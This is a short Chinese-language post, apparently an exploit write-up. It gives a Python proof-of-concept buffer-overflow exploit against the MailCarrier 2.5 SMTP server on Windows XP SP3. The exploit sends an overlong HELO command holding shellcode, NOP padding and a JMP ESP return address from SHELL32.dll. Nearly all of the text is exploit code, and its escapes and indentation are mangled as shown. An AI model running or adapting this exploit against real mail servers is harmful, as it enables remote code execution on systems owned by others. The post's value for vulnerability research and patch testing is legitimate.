软件名称: mailcarrier25
环境: XP SP3 正常情况下
发现一般都会有检测字符串,要构造攻击还是有点难度的····
E-MAIL 程序, 无验证登陆 发送消息
熟悉 SMTP 协议指令
python poc:
import struct
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
shellcode =(
'x31xD2xB2x30x64x8Bx12x8Bx52x0Cx8Bx52x1Cx8Bx42x08x8Bx72x20x8B'
'x12x80x7Ex0Cx33x75xF2x89xC7x03x78x3Cx8Bx57x78x01xC2x8Bx7Ax20'
'x01xC7x31xEDx8Bx34xAFx01xC6x45x81x3Ex46x61x74x61x75xF2x81x7E'
'x08x45x78x69x74x75xE9x8Bx7Ax24x01xC7x66x8Bx2Cx6Fx8Bx7Ax1Cx01'
'xC7x8Bx7CxAFxFCx01xC7x68x64x61x40x01x68x40x70x61x6Ex89xE1xFE'
'x49x07x31xC0x51x50xFFxD7')#108 bytes
buffer = shellcode +'x90'*(5094-108)+ ('xb3x9axd0x7d')+('xe9x11xecxffxffx90')
#must have ()
#Found JMP ESP at 0x7dd09ab3 Module: C:WINDOWSsystem32SHELL32.dll
try:
s.connect(('10.10.10.130',25))
s.send('HELO ' + buffer + '
')
h = s.recv(1024)
print h
s.close()
except:
print 'could not connect to SMTP!'
